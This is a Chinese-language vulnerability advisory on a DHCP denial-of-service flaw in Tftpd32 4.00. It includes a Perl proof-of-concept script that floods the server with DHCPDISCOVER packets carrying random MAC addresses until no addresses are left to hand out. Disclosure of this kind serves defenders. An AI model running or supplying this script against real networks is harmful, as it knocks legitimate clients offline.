Tftpd32 DHCP解析器报文拒绝服务漏洞
Tftpd32 DHCP解析器报文拒绝服务漏洞
发布日期:2012-05-21
更新日期:2012-05-23
受影响系统:
TFTPD32 TFTPD32 4.00
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53649
Tftpd32是Windows平台上的tftp和dhcp服务器。
tftpd32 4.00的DHCP服务器没有识别DHCP发现数据包的真实资源MAC地址是否与客户端硬件地址相同,攻击者通过向DHCP服务器的客户端列表填塞恶意DHCP发现数据包,导致无法获取DHCP服务器的IP地址,造成拒绝服务。
<*来源:vendor
链接:http://www.securityfocus.com/archive/1/522824
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
vendor ()提供了如下测试方法:
#!/usr/bin/perl
use IO::Socket::INET;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
$a=1;
while(1){
print "\Request Number : $a\n";
$mac=int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).
int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9)).int(rand(9));
$socket = IO::Socket::INET->new( Proto => 'udp',
Broadcast => 1,
LocalPort => 68,
PeerAddr =>'255.255.255.255',
PeerPort => 67,
) || die "Unable to create socket: $@\n";
$discover = Net::DHCP::Packet->new(
xid => int rand(0xFFFFFFFF),
Chaddr => $mac,
DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),
DHO_VENDOR_CLASS_IDENTIFIER() => 'MyVendorClassID',
DHO_DHCP_PARAMETER_REQUEST_LIST() => '1 2 6 12 15 28 67');
$discover->addOptionRaw( 61, pack('H*',$mac));
print "Sending DISCOVER to 255.255.255.255:67\n";
$socket->send( $discover->serialize() ) or die "Unable to send Discover:$!\n";
$socket->close();
sleep(3);
$a++;
}
exit(1);
建议:
--------------------------------------------------------------------------------
厂商补丁:
TFTPD32
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://tftpd32.jounin.net
评论暂时关闭